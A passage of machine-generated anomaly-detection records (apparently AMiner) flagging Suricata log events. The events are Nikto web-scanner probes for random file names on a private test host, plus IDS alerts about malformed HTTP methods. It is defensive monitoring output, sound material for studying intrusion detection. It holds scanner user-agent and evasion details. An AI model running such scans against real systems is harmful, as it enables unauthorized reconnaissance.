"{\"timestamp\":\"", "/parser/model/time": 1583349514.19741, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":728237458783181,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46808,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tcl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tcl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46808,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tcl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tcl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.tcl\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.tcl\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.tcl", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.tcl", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46808,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46808, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":728237458783181,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 728237458783181, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.197410+0000\",\"flow_id\":728237458783181,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46808,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tcl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tcl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.199492 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46810 -> 192.168.10.154:80", "/parser/model/time": 1583349514.199492, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46810, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.199492 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46810 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.sys", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.199703+0000\",\"flow_id\":1995991545415704,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46810,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sys\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sys\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.199703, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1995991545415704,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46810,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sys\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sys\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46810,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sys\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sys\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.sys\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.sys\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.sys", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.sys", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46810,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46810, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1995991545415704,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1995991545415704, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.199703+0000\",\"flow_id\":1995991545415704,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46810,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sys\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sys\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.201581 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46812 -> 192.168.10.154:80", "/parser/model/time": 1583349514.201581, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46812, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.201581 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46812 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.nn", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.201869+0000\",\"flow_id\":1416587572285516,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46812,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nn\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nn\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.201869, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1416587572285516,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46812,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nn\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nn\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46812,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nn\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nn\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.nn\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.nn\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.nn", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.nn", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46812,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46812, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1416587572285516,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1416587572285516, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.201869+0000\",\"flow_id\":1416587572285516,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46812,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nn\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nn\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.203262 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46814 -> 192.168.10.154:80", "/parser/model/time": 1583349514.203262, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46814, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.203262 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46814 -> 192.168.10.154:80" ], "Timestamps": [ 